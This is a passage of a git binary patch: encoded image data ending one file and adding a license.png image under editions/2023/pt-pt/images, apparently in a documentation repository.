zW4@uD>R%Vc2d_jw$0vW9{pOVTCB6qM|A7>TIy7Y;D)baGimj4&Qrs7-u>0?;qQ`+) zckwEIUua9gSxWwm)vhu5Ldb5eOaH(HKpN-<2Y6nW}T0}cAMh_yL5u^Ci^Y-inUyS(ViUr z#go?FpK7F=`2;`*ipdq4aeU-v>9WZU`f3Qz?jUBHcNFmL+f^6jzIbME$@9BGU=2ThCb1vAL(?&P3fUZVn(icBy&{T*BAKD!@ORSolz&pBWMhblGVBAVpHu4a zslRk8Wxle1jQfH3x((%!F+=aLDT&yf85#rR2^)q_?@w5kP~)?T7{#GsV~;0Gj~kO8 z&+dA{5C)`=nS4hiXmJ2kVh9^Osy;vEG|c+K`eB_Jju0R zx}^=C7Bq7sf)tfIP_dRyMAbu__$MzO?RA}_=7f+DlNXiJ%^40!c0lB%>R}t}%@c`k zae>29Tnb+0PlBGONK2j@NykNsFQqfLzUD6HM3lsZDTbvji{Aq8j^pdS9y91dM6%i!k0v4{v_Hl_xw)i z#{mjDjod{^v};G~QFrD9eKcxWsRd?zpO>Vcx12AmiMX~K#``|xb!-)JfJLGRjCl}W zt>fl|;W4L+a4jN_)<~zf&q;h<8NY!Q$N8(C(G*mVUf6k+m?o4JN2S<>tJ;#!ru(RH zZaBAA^*N)J{;I*E%90|NN_i$FJKLlXJYu=$9y|t!sXRC&$&xHJ43SzJ50;(ts*+0l z2hLSTQ@b9sD+%*6W_sb9EI1Pu!5^&l2uFY8W+0pjoAy!{ql|L%xz+@iltk zP&C1&tAb1)CDZY2?zw-=5Y>b>KD695a9eqn*t9>cc zJ4*A8lA&Uqpb5+veU_7~1u%&-AfS#bO`^?A_-uy*{){nq{;bDS0TIij%k~>7Un6N= zdk` zcS(&~hlm`zu{R{Wo%)(6`W{|2CcajmbX=4}QhUy6YqGV2$v&<~z?Ipa)P?gCsA6#> zNE9Hgi(Z>?(g(#?`O)g%6DpK9>z6Ih87$KW%vuy%#itq za0)T@kn|XjneEb-2#s{nV*D;h*ymWzI@QB$rHG{PJ;sXJHbV@BObQiH5gG*42h&Ic z9S8(}D|q8NGmd7;ehe*HjnlRKQY9uLVZ~0m{w?w$gtUP%V&P^bWy|6#tN4(30Et`* zs4*GqPcHwqXP)gm;3*dV?10zLe751ye5Mapwp6*Jj~PmOk$~np)zXoz>Hprr^>+;M z{+GR(_@nfMI9Bpr*XY)F=@m=oLnP!EZoMu$rm^T=cikwnMXYqzdQ~l{4P_HdI(S?y zS04|h?t?4-2A@}o4}rf4hlm)~)pXHoO}P-1aQ0SKiN$os$E9&Hr7J~acVb`{L3kuS zB=(3tl@|*~0!T%sBrvKQiTY}& z+x1{QZ(Q8#;r*09>*vwm058#qIk&LX?3{Dh%5Po=FD;zRaBt4NzDsnOEIvYxcpPnjtl{vr|c`y`n%N8z}?Y3PM8 zBYiO;MR8h-e=QpK1rg%tm)EBERUhk~0hN=ZFHkr9evA+;`$<`NoJWuE26H*mv^N zyUG2$g!c6=;BcBAd(R0Q{n>-8xJ+lozm)dybBd&VrfMH^1N2CNCIQFLcMSt)Acu@L z7TV>B4lRxUbrYsrL^D00HM_wz?)Xe{P=38~@yTch<{fgw@u-zh<;C5r5P^XwUXZ1E z$r1OCfMcH|UkfKbP~Ia|eaS6FJ@ikc|HJo?#lg$?dWTyOiBAN=#L`M5EH|duP0TON z4k4!ErzDYVws-&|Ya~+_t+|Lx0&*RF`qAGVQDT$gQuFR_2;@Q!;r2xDj~H!A1kA3Z z%M&{TZZ~-AlFJ`uiwnRz?WiZ>f~>{#2C!&8t=u$2ISQ6Zj$w{D0`3KLF!&bBOM5Je z40;+%y1T3WdGN%SS1LlpPReQia?D;>+S6GKIX@v24~=JsKiM|%R4Y$nY#!dx8J4)r zl()U8MNDPZFdYUOfB4(2i4@tR`PFxd?Yo3#1is9ecuCI?9Pj3bUKe_)blBzWy&RmT zvu&YYplEKms6K`@Ev{+q!%9J-POvbLRltqL(tFc=y)$>U(>y&ZV2A4Rm9to@P>qbE zf`J(E>*R1D9KqRKLSXp=4nb^R1_yu?o016EuP-6w#N({iklm%>r#4{A62DAQleFYA zy$A38B!p<0E8o^og?RV=^h@a7l&V*(%KaCvvP!*^mcV!zC^n7F-S^YVX$SyzLS7J6V8r9INV=wq{UM3MBgry zXErtB>D68U8cq0-!=5w1Vh!oFlD|U4TVj@)fWU2Bl%(@Q__>%$eA4`gpAMgumke@nXINk2odZY6)>Jic3gNuA& zVqo;$)tKv>A1x`otbFYI5bDxbD~Lu!Ecvp6(%i4^-&Rx&Kkb_iZ8{z_T=r7m`aZVI zg{u23@G`#@%xY?hxW0GBxwc6i*5m8Us+3SFZsA(1JKSqGY|~k5$kXGG{-g#*uX+qb z5$dN`_sHx0?)@Ffjsp+0@rvFBls94t%MKsfN`CzCbl4EZAVGW+l_|w==l5|&C5+!3 z16&aBsK3-m1-&SEQ!{_lEt&(&G1sS5dP74gj_c zBZ9cjnj{H6*-mQ}II^7I^2Eq2yYnZkTv|qziLe4nT~!*fE%G+zxtq|N*B!ba2!yj4 zn3q|CtE<5(1Lu_mB>#N>7P<3P^>XFx@hV{!q^wMn?#u%j= z@vpXTZ6geBFJzmanlIw>a3~KK4Bl){PBUMvJWn7M^MQ&!U7Ug!SF_rGB(m{$5$qI6 za%IfMH^>W?YvcrV!H0-`uoz95P86L1nQOv)~;KkTnQoZyz7 zmggji^P)^@dG(6*Qau7-m+i(4eMID z-ETe({OHw?zlAh0&J%=J#=2V9Hy@YKueY10=bHVs`&R5QT*Xf+TEg!)<+9gr23QKh z(YTg-G7&L`6UOPzX4p|Uw{t5DqP7+Cb#km<&sc&AFlTLdDZl|wi#R!G{e>R6lcZ%^ zETZa7MgRF+Ed)OHh8HV4ny`r3?Y(+1X&L)GzqK;abIYwPas z;9RK-SZSG6jS&^!Nxvd$@oxCO*KzL(HhcP5qB*wEYxW8wxNB7DQ(W%LO@sHYAsJjI zj}U;rq+Kr^>gZ*^&c@S{MJgbpuQ5hkBUGuSG`HbP_>MLW*ebJcq(eqT= zQb3gvoa|p75*r;~WR9|OXJ)J~hnf6@LuL9=BT(pq zgr%Rq%eNzn_Q*ee{OF9<6@cGsRHSXvEOJMw#?O5~pQLN1#Y!3zV)uqz~g+ z_glaA_TJnC@4V*FLqOUuE^{F)6Gn*zpB5M_8@L@FzLT6SUmE@>Nz$)vgUHoiA3!yc zR_oGjUv-wepE#BdHymF8FFM>sOG5Yc&bDn9!+RK^TQinJvJlmjk7mqTt~-Q>bZ(45 zuW603EfnGd#O9_((hY6&(3VHcBrL>9Z>vCtiGV!ouYg7Iaxel(dst#b2n|byO=r|& zq%r`c6vzglcie5~PE3Bvonl5)FE#*?seLJAc|}4b+yUY{S=;N}WS2)VW(?zc3%#2m zfJ>%h#8*1hr4qqqZI(*jA`?L9cpQ9-&w$}1P;!Wn`t(UFv{9ag-S4ncblW63OA@8? zVaOGH6gsBaBxfh8D!pz4IH#L8r4V)=b~_C-hj*W`)+(EqYDLjBJPaq9X`C3=WHJT9e1BY{z-2Uv8i;ei%{4<#?pR zYvtCytwhO_0YAYuO|0QPSBSCSz^OBN+SW;d<9mwE_i=Hf)sczkAre1Ncp_ZxLX-Hj z%W68c^*l7!#kd+f=MGlk_*L2A-5Q&5fo1$crhdd&F)V-a@MUVV@49L2&daqWn1snk zegWXJzgc@KG2A-y<16j}ncfdi>p>7YLpYtlwknaNWuaCQ0!4K9oY?seNY(rPwk2Qu zBSnRCR?>Vx$RXvjXi9s9;7TLy#C~ogv;;dIy)Cyhy&vzfO0pDKx_7$D!LR35^^Zjz zkxnst-9z-uu*Nh3o(RO+UJ>6X~oLy!4O#Pa5Z>hw+BJgRAzMjMZrFH-Bme`@5&F;^yq%bkqx1A2IBw*wa zOuTSj1a|2csS)Y`r@my*S%w zQpwj;WbIE{Z-5)D2=n1Qs*=h}9ZB(QwFg|m!^(%z`>|wL%`;zGSgd&^hXwe_s1J7s zhA`t)lFH>lRKTyue9-`6dMJj9MQ<6W&LRc{!E^dQa59 zdS~tO9f4{4UP5SBADd!+7(^Qzd8iQsD0_3HUqT+y_zUrx79)DEOZBNNy&8*VEEmwk z@&|_wd)MfIMBRMz}nXu>Dz;o`=-LC9E-XyImH zACEBtxAnM`|19Q7QQMV5>yU8(&-9cl`5@1qnEmr%1BLsvLr~ zYK@LZ--XLsGsO&OzIOZb%aiMQ)2RIdyPZBRMW=|fb!1(*%dKOF_1x>eftK-&MCxXr z68TxwbG1fjaunt_6l$%`J&^~syQhuzTy+ky1bx#yxz4aC4<^Ikxz!;zzdxrJRL{Er zKq|km9y{cPK{Q795Lv(Cuuc>qD7%jbaYG*_xd)ay-x1T#Txc<(8Awi!x2}Y>Rs8ui zHx1JK{boaA6t*OzcsX@d#qMmQ_0FG;r6^kiZ6GaMorAy#*wSG(H4=;J`Utz8wot|w z@nLi2-O~Kh--?CTlal&oC-{bpNk%-wFI%Jw&!m_aRf(BX2tF7OKjr zY0|Aft#mbsmHqHwaZK6_O=$KK(gE*^cuzgB8swh&h5~+m@!|eSy8o@I{DGk(^^W3d zOEnQVuytK~)h39KjI%bu^T^Ys--3*(kvf9FIU9yaPp%!g;{Aet9O?Vev9R+ve~5Rl zgl_j$x@W=CJ1Uk$Ukbzi$yF!&w6Diy*sScK>FqD|+H=qeal|=GwY3>9EbUJ%gktWR z<9FA=PG&~0kle>@KYzh7Ry0=(Xfqr|G)f2#K+KsaVm~d$XI#>nK|}e}1g;E3+DJ>B zFLYSM|G0jr=tSe!Pfj`^VD*NfR9WW1dzWDxmm*xCGw@=t@hy*mB3(SFV9@-=x<6}BQW{Isnq^L#igVHq2r3)_{_qpe$-FL zt|r{Rl#(Ru?rUHZk4F%C>(T@07YG{3dm-;wy4u;TqkI{5h@S!2ov%Q=bEeC1#B#eD z+9Obo>BIRi(v$vRzUk*oYVW*Ed;W9S@TBhVptV>;oEX_Sw$byYP^~?ylfFHceL`KP z$m5ERM;*?GDPL1Of~Q$6F%FBnsFfzZN*!^IIgoOo<5))OVjtBHj^9D-eQ=wEcR^E+ zVa`mtKZ*_)>|Urw1v2qnlFQwH8Gm8bk8AelJ(X0)D2NkBlL<={%3ExPJ=)7Zcmjgoac8C0HpB9IUBWywW?(Nh zC$>Ul1QbkS-*e{B?xBZ+JY0fw#wVIz&Yv{wdd`2OKm65-&^D-B?8SR_M`x8Mq2Ot~ zpDZ{zjdVRZP1g~Z^5rek{T9N6ZgHA-ydNuAy1IAt9XZVs*}Oa%4VTEfZxg@k9VTC* z5(+VDl|HN??WsbjZA<&G8X#!8boW!P#f20=eC_<>-v0e2*PSXhiVyg0g&>hgLpW)v|z6d&Qlqo`2P*z7y* zEZ{vq$RGM^HW%{=YO1P=MotSB(#l&|{xT9fvOx0pGX<*UTl6aBnJu|H3B4{ks56S* zbn5N<5w`+LBzrwW$wTjb?K3V5v9V__JoHcNDT`1gJ|q!H7nv5Fwt=a5m#wgc(^W@~ zc7;e#;Wo7_)SM!|^v@c6`|I(Lbn?sK?TK@x#iYgeLP*QX8}c>E2__X|$%7!~BHKCh z84Ifuo?bJ^#vP{fM>@_sMTnZZBvnW5;@!luTDxU_=RuBeyzL$AO%abU$WcO{jgkLA zF!WDA5^tO9i0KlM*r#T>F%bF$ZNb*R&Nps}OCM-xAq>1|G3r4Yf!)&m6Qa&!j+<&| ziQwvE-q7*LY@Nekuy5Src-2|1pQ#l-vxq`KwOmxwJtp-$>-?@^BP7^iZumi+FCg}W zilO4uhQPMW((<1HTX&cWVV0>vCpFg9_wQob8OOz_KT!G;ulao_KvjnjDUCDlgw_4t zUOGl7R9YZkM~wM>+54~KZQP#f1cBm1r--{B{LBUTQ7chkvUgK#1gKwydQ@gl4Hkx`3@V3`t4LdD)wS{#zuG$K&aehVOYIcx`lP)_ zHoq`kwJ|K{2jR;&`nS*Fs!vx+?dc2~#h2)%C-RNnU1a@3t^)GyY~H3-gyTXColJzw zrT3!X=T}>=@>gEM*XrunRF-_65^pNx!5v%;Gd8$ME%-C!)rn@Gehg?2ODx{EYHQV} zdy@~j5X=g^#i^yDw(wbXh3MH;)hEBWBUNz$#N@p{Bn2BU-_rBCNz;1K)27rSK2qdRGdfZnx+6-+~4~+jmi6TuB_Q-)DmII zCCH7()pk7>7;V8JES?JSfp?E#?2GVnO$YBe_Pn`P zGni@yKAO?6W~X233&Tv1L8c0+vgczE3CzXMnVddcp|Z++`mnU(JDeYhYvh|&H)!sM zJS34?Gs%#zdurKR8{R+55jtNFAO}z<5WP_mEsG*o+wtcTlednFsLgdjl>ustsfbo< z)A2o$zO!HwAz%Y3LAv5T9UefI1i9+pPC_$9ji<4P36C{^PwzR?NvlYj8q(gN#Unev zVYZVquufT%saeKbDa`PP>~Vm^Qp^O$<`*LV)3ll$sFKk* zUnLqV{N(yfYV5CUsfS;C?de{~%Xio%8fWbY3a>A_eD~-7%qLiJYI)OG9B3Bwu#b%J zx3_aRg|G$PDLuw+J)`o1pOt^Ls-gYTmUSSN9I0r%uHff1%mD}srHp*=W}nkWQYxe> z^I?-&2YoK6X0m<+v9-Ro*3_|w0{2)jcWuy!g#3inG)WN@d1wCM6K zjJPV#GLBRmnF?GeZdn8^uq>raA1=8<<2hN>+Zq?D> zzgk8{fcx&fy4{Fi&bc})rWBU?POdmR-P-(16pQY666j*+&M}opeFKC**_q37rT_?6wVbd& za~*re{fSkbONUurcxLUX*=ypB?>U%YCP-cD&(+N0)cJlj126$#C<*J1y#8Ab`P|&V z2EznVD86L5TWR^Iit!veGS4kz5jh{dDZrLNA+!_3wK1m+iw(l(m3kmgR$90)NZaG- z>%4T^=?l5E6Mx}0=x>XX)4VLb`HHp^{kZrMPxfdplmA%u!{EBA@yBz4vvO?{-+}u! z7^79LR`sO>KQo6c!>c(kZ}+!9PT%8K;ryhrmuSg3JPU{-q#NasTSPanV$+ zhp`31n=|MwbV2(52wJH-YxC3&0`p7NuD)+?mFZ{C<$8_dbslwNmQ3(<^R~2+-*ST} z@Lxp+T}0T-gs$Y&7w&7-R^7u%f0oSZyZ7bvMQt0m#h6M%WDUhK>R~_i6`CC+4-wjR zLW-ClFKA@A2Ld(bcF6mTllK`AyJbJ^*{)M(N!dt%xnGj~dmbc~1 zEFi|ScegD6<~FlSKP;K7(AwlY7C{-B-9q!*oG(y*5b?=gyyqRFvT!*#0GxO&7KiW# z6sq0j1!4RRay_1@cy=W4ep_3>Ei-dW5NbDi>b#hkG8H?Q){r3*?!<6*!Ocsw=>GNkNb zD?>Qwo)3kx`(3Qw&4*!t3kTy=OoJN;jO{2_eH5q#9G=S@CjR-OyBSw-q zt$kg`M1ndcSWHga!or90PP0dXN%}KHg~eW`Dtg?RngEoDO49(Mj2cFZcaLAuSl)N_ zk&h$F1P9Y<%y})&n{%vqJcSwy};hwHJM)Ch0*zaHH0mS0s^5&(> zf_Te_kcVC%Aa(vgx2IaFTybqTo(GVJEQUPW*sABmG!K*QlnSTa{(G8ot{Q`ob7PDR>f* z=(IO>oR|yuU_VoscY+>~Y=*AZ5cnn2fYd?*RIp$Vaae2rlgh?itK`pXowZ7aojLH% z<=*iEp5Wjdivxz*P?E?o%}d4DsKrZx%pT*px+!K-Z481?m2WQlSr zg5fMev6}<8u+=9FNEs%RmlT>b$cx(%my?7P1Vr+O^GB88qMV6wGy1wYL8@Km7c!)( zxVK+`YkX4jWo_?+s;2gA`*g`?in|c>A(c4+KO5X9^v?d;deb&CQm;mf`X=Le9RY^B zM|F!-Jy>}SE61aoatbZV#L-+cAt+7A2ygU_!fJDp_y6-=@&CM6${5w%A!a^+ze9>C zXoY87t;6O%v|?@Cd_A3s7s!Rz7E{7|y2$ED4^D#M> zUQb{3Km~NyPxT1U?Q3)n7jJLh$Dym%1Be5C&mxeyD#NSUv|Hn~z{`*}$ zrQ=XO!@a^I<0uEm<>CNhHVoI$>TMR&k2FG@Uc+uyeU?u3+l)?}j|KboN?Vqz^GsK$ z=RM?Q8D>+hjdfRPny=zU_+a%tZzbM=-Er-!_r@+F0*F$h?V$bna^K#%dNEW9 z+p3vPXgdP{A(R9o>ivr+x3MX>BCnJSN_xOptch93+*i~RoC~bg5``PCWnaNGy7Nlf ztS&8E7X7isbOMdC*S`hF%XmJkL4|CbQfJwPaQDPffSW?D)4_U6)0>91S{;M8qp6oRMN9pe{j&4rzTM}s=$;mnLDERX~^wRvfXjC$iNP|+i9JoMa z8Ics&ZzVG=u*}EQEZyw^=#(sENM8k-{)}X8*%NiqoU{XRPEZNT%C+|<**GodP|;gm zUU!(+S0BO01%O#i;hP4#k)?Q=PlOE9G@SRdTqh%WzShhyG;cA82g9%JrX1bzx5ti9 zh136^)FjMrKl~59&oQz0(4n2fs~$T~F1wp1R(c*omUv7$7AP_UGbD@VXXQ6%){CpV z&bc4eTD-T^O32eSttu9+Bm5t0m@yun=Sr)Z{e4-Lkg3T<{!4 z+iEx1FW9WKS(=qdBV3Sbh?Lof$r{7S7&P(L5HA_O2bfL?wA@18mOKK&ye~+e(fw{X z(Qxgg($@mwxnLcl|2riW)F<&kqB+*41F`{^2uZSks~%z=XB?g)UN$S9y^lza7ok-( zMuOLKy_TE42Jm8s(U_3y;HaL@kc};P0oh)_1t}lir_#cEaMbshr{%uapzh%k-X0a6 zQ{=^RdQFT2CCAZ-7}1TE?q1ui9xI}7Hjb;r6d|jtVxd#Q0w_!gj7=&rB@lDux8pc` zxbaciB5im&r)4RhzIbx@(KkU>2i*xt1hKQzAD##*PN)6xUG zQD%_{&J(On_kCkNR*d2BIpBKp1h{j``noAH8qlebLf85WT?|jcU4f!t3Y{G~9EL0a z4F`h-*H*XLy6v_7kd9? z7V_)lBqEk@G&W}1nkZqdg8W4IvZ4DTUFePINxRO(;6CzgbS)KI+JAZHU#tjK<@!gf zR#>4J;kwSEC56!LZOhGnCmoEz`7Ztr1Sgh?)v+~NcU0d}7w~alnMv1eD8u8_?3mBs zO>AkY!;-oEyqaT7$Sfe>Z0Q|tse2nZeuVLupT2QEo%{aW{ICas&Yu`(tg>h5EbRpT zP*rXDO17<7nMM#)ta0Mf&znva%|X89*nkpC`E%<`M(gQNfN~IyCKwbZH6`FU*w@Ns zRvD~)a{0P$)Sz3u;DvrSM?^^}mQdoxSaKP;LWxgigxO1;HY0nxeV@4U68|>W9!@lK z)p2WpQFx9t{n34_l4P)=Z}0;`Q^CKdv>+V%x}=rw{W{wPDhnTK$b!hDB<7jO@@Qe+ z4*^1!xIyyfpqdSYU#?4juhxz0hV) zKVhl3AFzlrl4bM3OCRag@t6g`CX@t0x5kmYtzLUYUAB69w$!)BU6~6I-)Esk1D}VtjdZ!wqOJ5>$$yeK|FeQc{fC6e1riu` z!l96$9rD02OoU%EE<=G^SIW1FjW?w~aRy6yP^uVpBjDs@>Gbx?(poFD7=^1UQe1Dp z(OQ-%6fJ<@kAPI_;x|_UBG&e!dWl@mg1IkYBI+Ske~f;gpzU?l=RKLLi-# zI4SN`j6*Nd%ah)rNh@r6`mYH^R7w`0C*y0}GQqP2L~^Y#Xu!3G;^>|ryy?B;(-Es# zo0%A_P1JHmBt&7cvqKyRLk~o*hUlo{Hl?lJd#)KzUl>xg1)y2HLD_*asQzc6C;W?h zlrDGs6j9(PUzC(OKa{)fymytocFg;Gv(`k8*<496Rfg8@uVtYvVzc+?14|Ohr zEQ6Ow(FAb15@HOM(gI5G_MNP~_?)e35~nvxmb%({m%{$2s<|nEkgy*)zYD0I&|(lt zbN|YoAlH+rED=PUJYy$u>-YBM1mcyvkBi0?mQk*oJS<)EsZEg<*p9=Sl^gDa@(I5q zpWBq`ob5JPo1r-O1{DHXce)LY z60~v}u@pB<+|KzFu9-|qNmwI0JQPWFgx#^;eZ{N;b5oMu*6xhcmUd4B1`J|4)z;pQ;(f0IFOoPqbH=)t28 z^fXWzs=M`Q@=Uo!vUN;R#5Ge0M<)=?@oUcEd@YQ$$WabE?NZ}smvNAj2pnt-aK4Z$ zWtJctep0vl{deq`iCU`Zs%D}EFG_-FUfyH60YiNn?yf&Ht}j64tRIV8PB(0R4^&6? z={9**a?ChD`5c2pMO#!^+)TSk0GBqR(hfLlS&KY(nCPiQ!O3pVXoBM z{EQCY^N7D?nsmkb`K-L$L%5cDCv5c7%avqJ__pzifX-lNYY@Vxq(V})!T&s<)Yq(t z1iKL%L)SW=2cA}=I`{rXmsh!tZw>8N&MkEhoUdeVcK~__(iv8q6uIvvD@p%r+n&-uP( zE<)Cxz%A}ixKBMhdtkF^sj!8b+s5GS*j|4oLlgC?m9F*^@afyz$;wl>t{GAP#hLDH z#;HxpuBo;}Y_BY{DkIKy5;$OQ?;PkK1Id2;3K+C@u?soCAx{K3;> z@NPur*wx>fU-F!TE;XKUY2KM8w|~=){#xyJdhIqz_G`81cCNX(qX7(z#J`T@qZWpm7{5*by zuf%|Eem)Zb{O)UW?EDi}7BImTvtL3ay+*-$)E*Gf@tix(N>6risa%-6cT&6RPqF6U zpHt$Ki};$FbN zB?Lk|W?HXYKR-41eR-t0I9RIahj6`N$UXXJIUef%6?jFB4Dk_&x|z)pa%EcexH`Gt zof4AKGwOJ|$a6alRk1g|vD9t97rEw4+!TMRT{LCfPjhloh`1?NgAFAcZ*5s^(g%7VC4IgG*6E`ouK`@F78s*MEAcQeGU9{95C-@QAS!{X5hyu%hCpa&^bm7T zK=(47ZMin&%VM$Uj@{(tSVeiX{zveB`)w;yK|n38V5` zmYUp*>gnNS7aGB*IbY+`zeb0lk@q(iukl2y&H) z#kjhOAom*fk-M?D2YNuM@P)ZyUQ}lc_GrpsjHf{y^xY5Bk-3l zv9?LnM|zWqdonrRS(~}%ld(7|s9^&@uGpl0%U^<>5v8*#__NkjULcYNN~*}4SeS4j z)AwGK+x>Z8o6n*VaD+yOb&<1e#RXSst=(Lc%4>s&jeF|KYn92U(&e65$^1IYK<$Z~ z>_MY}D0rI>X1-bW!ln-M%&C#GWNLz+>C=zB*fIqQWZG;=5xCDI?ZEpUeOutB80jQ;q`V{a~KB$uj6GW z;7f9`VQh&$kKw&Ksspno8tIN{aP8=Us0tb(^81|gue(L4A--l`)XE)L4)!(X%RM?A zkfd$UMIWR@w@E;E7N>E_`uNu z7b*y!h&}*=5nfb_nHigYcIV;jB+jl#7Xn7h$xw zhm>pK%u_%&)km9-*jd!a4SSDzt_IaW*^}Dlj}+omku`EF^ZP4^c~Qx~^kzAmmrYIC zwVQ2h3i7OMUs>x=fAQqgYZvGD)^W>>8UOdO;1Eggz6=0UnAVxuUeV%qktwLW-1J2Q z&yog*`$#;SlA4?-PT2HcWQVUa z*b+0g{m7i$~sNUOgI>=)@( zSr~otyc9fjnTwyRyOuD^()YOLkZQYe%0BWGEO>RGl}Wus2g2Tx#xS#?o)>Wvxu$rb z5@+(gpTSo9TT$M(s4=JPiDh8huE3|lR_s!jMO?A#jJkS2`$_8G+u3LU1P#0(SNm?k zJ?HhtcjT%z`xe+KB^GpkMkb5r-qA#(J8?l{+nG0c8}xRI0DurE)~)_>8RQHP4_CF; zma>X-8e4f%s6nkM1S{fHQ8k=DdCC#zzjMX{fIp)_AXm)uiYz+(eH58IkKL{Kq?TGE z2ZsUaqgxF1R=p<3);%jW2$8T{xJjYFOz-gbde=_?)Nqti0YX>Pk|UwSYCzwwzpUTv z8)DW^hW}4{*8b1*8pqp=SaOSGl6AqcTyS9B?W&5yjHk~eOM*&ZPf#k5(J4>n;6#uhTKHiXW&Ddqc+@6#y&^) zy%Ky%>xtr>mpmwYL)jX|p6m<@{GddodZmq(h9z*TNKUE$Os~2snBy0SH!S1FlEqt@9`}zbsY(jW~z@R-XTlbER__WtX z6%foEsUEwL4u;q_Q4RDe!MhesN~kLd&tCxI#Zv8^-*C0#Tw|ssilS6MH15*L28>TR zNipHe($2nnpFVWPAP2V~_ENfzyDS!YBrh2stu+|7ZY2}K!3v~R8RIUK zYOw5TZp6pW2P4w0b19U16@_voQ}O;zHI0@XM}IZjItFSrV7zmQKPM0tI`%XAC4Mc~ zghb)Q*>nS{$DPKp`rtFADpdATC7@yrdq&}9K(U2X2j}5_2z$w>E8l26)K0##$YF}b zk0kBg-^EW5Ti4BSY8-o}y#Vc~a~q%t3sAJ=1(E!O39SuIv&)oskh;T81 z?6Wp7E4Ig*A#~iZyfF917eS5{`C=Ojn;mQkp=;z}e28%E@D*BOK{Wk%YHiAFrxu%X zAv`7(;XD+gy<9hOduVe*u-o}?Pou!=<1TK_g)PIqmK-V{bh7+_0;Jzovv%rK__zB* zvTPgcMSr9i`*mQ&%Vz?U(FUe&scZ_xD@m&AA5ao}aH5gu3k$stqQ5E)1j%zinO&Qm zwTyC_ZQ+gpmAk}npGE0c^dg16gCPUiEKXM&Jac#;>pVJr@+s-V6?$$za}#N%?aIwHz9;a_)M;F}m}pYeZ7 z=;EXe@nv@l57yX^6eNpBhmZH9Q|9PzDz-)G0e=x$szmFHj2@;dtg7#F&UOSM*vmmS>Z?U*%a4=*IV6?W`eifFS)|;jc!wCw+3QA0Z^akuVb*sADVS} zDC3S!k72_Ap*eOVi~+bj!j8?>PFVkC z-j(;Ee%ck4R7dA`P1?BA=3+zG6U@MthLF0}yQkp>R`M|B(Vi<+B6iZ*zz31#qohD$ ztvlvD3;B;t_pXsG9}}sZ%;nR!UNhz~VpakeF{+KqH7mS9x#Xku!AP919(Hki4Xt>B zKn*moax$|J`d0@G7Mkb7uAL;GyZut}nz2 z2k<@YkG$!aoIIwV29x)C+XRuFDuK&LvwpRxI3^obSpng(S#(-1gZ@Ypnrb7s5E&*} zC3kL#ZUjMk*Y#bf?~Kn{Mmj~jCvAyDEHpG{z1-=qRBrSL5G3(;Rx>ee*wP@6%drdR z-IooxZ`+uyP{GvWJ^Ee73G2@5qIHYU9Jpx7&s|X|y)P$fah+xiS$>ed{riA76&fMa6Ln`T@n z3G-qPxl3zlOt&N;Miw)a_9bC-5{?OMl=hC`bbRc{WZ12f0pB{3&2ah9r>Nd!3g%mq zbLq9p;#8CLthg_Q^de8adE`0(^2P1>;5kU@@@_7$`el6E?1`WmU_OKB!mA0iRde&y n5`Z(57T;g`-h%(L3Z^$l9HN~lnR#iv0C=`}@50_dha~?8W}XoO literal 0 HcmV?d00001 diff --git a/editions/2023/pt-pt/images/license.png b/editions/2023/pt-pt/images/license.png new file mode 100644 index 0000000000000000000000000000000000000000..124d3ba4d4a20805cc0d23bce12d8f00f1acd27d GIT binary patch literal 14003 zcmV;kHcZKhP)Px#32;bRa{vGr5&!@f5&>tQ(oz5bHdskSK~#7F?VSm5R@as1kC21}5+Ee82nqNE zVv*Q4+t?Umn;38H*vTYLDxJh}lJ2SLtX-+;RC*@WJzYKHq$;WIRHeJdi5(}-;>1b3 z;n)Um*aowieG?!MAQqto5D1}_`Tx$-l|N(&vwRXH!-Y@Z^4`1e-gD1A=YN)aU(#8X zZQHh5Wo4yRR2(#YwWOpZyH>7I;Ln8u@N7#* zS|iQw41NV=A#LiDnryYTwbt6)Vq3Oswv@)kM$5^`7A_fX*+a6erKtsqCaf@!5D1u) znw)A$DG|}a4Fa13f0~<{tyx&9t+mx!)WAU0aPFVe``NQ?mPEhP`dS|`%8BDAtiJxV z9j`fNryEW?dvx?i$NTs1CmN;NkYPh?;GjW%4K!&u)6mXL9cL%}19J-gO-@O+G>uc^ znI=1Zy56d)s_kUmNsUKfV9rajRJF5Tdb$l6KGX&d9AL@G$=1};Y^_bLaRMyi&Fr>9 zcqk<;#fFc_vr{Kd+R>v&Ed{2dWB!t~Kw?DmvD%(JMK*kG~qvG+O=1Q&x8H zh}9gg_0Ir(mrNp3TU)C$emaC2GQ@I+4zbJunU*V91fzqUTE*zCt-7X{rPp~odY*#} zKDJ7$7^3EAjcwh$)eh`GV5dZfQzuVaQ*)F05=la;L5TNF*Thdv6{8HaAw!4S@Vwy? zHhESsGT)k{Ua2dxea>^^i#nuH7Clo^Q>?G<3saw}J7pW*TW?1W9kJ?aF}0YazP?`f z4II&Cee^FSCB;(HQf*MyAj{9sS9^z8(S&g}NE5Od25%p;i)zkgoD5?-ZPX#ON3(=t zN|1`KPTCKIZd~}iRJ8_&Nx}fYxG-azwQ2^Pa%okztIQ6IV09-?IK!T8jl@LT*@&_G z_v`OO8YxMUEe+B~6*?r+dy*ttiX=THYNvnl?^n;C_h~>Io1_U(pKh=N`wrNaO`Gk| zp~L!q+L{^~t+};X9eJOzp{L6C^T zxcAYFa-kv3(0aPnDm6aaw{EvX2M<|oO|6}2I3wxZ7}4Bs8bJ|+7ZahMw9K*EAO;veU$4R0gDtNh-__jU!GkSZ(tAX~2ul$`ksi!W@y=CMU``kX z3E0%oWP8i^+M$X=w({Low(8xLF2#JnIZ=hrp)e?vFgWxNx7FxanV74=CKOL}c+#(5 zx-~bc@0SU@xidnD$y8HWd0iFSN;`Lz?(*@ft*x=~ z6UJM?r~*myEJ^WPO&a>u`(p)dFN?9M01OFaK+PVMAG~yXsjFRP{b9X0hExdeVGuhL zi{FnNK4Mizt9+6m5wfJ}hUEKt+)sfj5d3{KRYu!9E=+WgyY zv2o+aiP1+}&X63RB+=x)_}LxW+9JqMx$lUrS-r+~mhQB&on?07#0i(sv@JV7+lJ)k z+5mmVKH^1T91%`HlqzA_Lx&GrwS?EQ*O%F*bsKGB$wbSSBVyW&X*P27NT*Af1id*{ zm&DjX*gzyYiP}0WRl8pJtbA{|9hZ7ypum%qWX*bvjTEpP7+l|Z=lU=}Fexw8FYnab z;zT^7`j3g}E3NkUF&i~%lo&nFkmS?@(Rf|S!tHB>Nzqo|>FwKg*#7c;-iM5g3@g#3 zoH}i)4I4gO8c7mO@FF84(`i7v=_|~9>eMN#*uUSl@7Q5gst+r_Mp|$E+Vytg*a<

